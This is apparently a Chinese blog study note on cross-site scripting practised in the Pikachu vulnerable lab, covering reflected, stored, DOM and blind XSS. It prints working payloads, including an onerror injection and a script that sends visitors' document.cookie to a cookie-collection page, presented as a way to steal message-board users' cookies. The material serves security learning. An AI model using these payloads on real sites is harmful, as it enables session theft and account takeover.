网安-XSS-pikachu

介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问

Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类一般如下:

1.反射型XSS

2.存储型XSS

3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //弹出当前cookie

2.存储型XSS,持久性XSS,JS代码会存在后台

3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法

'"><img onerror=alert(0) src=><"'

利用XSS进行攻击:

攻击方:

找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

编辑攻击代码:

<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>

用户访问留言板,攻击方就收集到用户的cookie 了

4.XSS盲打

攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。

输入的内容不会在前端输出,而是提交到了后台。

管理员登录后台管理界面,可能遭受到XSS攻击。

5.XSS过滤

<script>

alert(document.cookie)

</script>

相关推荐
灰太狼大王灬16 小时前
Telegram 自动打包上传机器人 通过 Telegram 消息触发项目的自动打包和上传。
前端·机器人
U***e6316 小时前
后端API安全设计
安全
Bruce_Liuxiaowei16 小时前
大白话浅析Windows 安全核心机制
windows·安全
4***149016 小时前
SpringSecurity登录成功后跳转问题
前端
小徐敲java16 小时前
window使用phpStudy在nginx部署前端测试
运维·前端·nginx
Winslei16 小时前
【hvigor专栏】OpenHarmony应用开发-hvigor插件之动态修改应用hap文件名
前端
扑棱蛾子17 小时前
前端代码一键打包上传服务器?10分钟配好永久告别手动部署!
前端·node.js
q***T58317 小时前
前端路由懒加载实现,React与Vue
前端·vue.js·react.js
灵犀坠17 小时前
前端开发核心知识:HTML5特性与经典面试题详解
前端·html·html5
Hilaku17 小时前
我为什么说全栈正在杀死前端?
前端·javascript·后端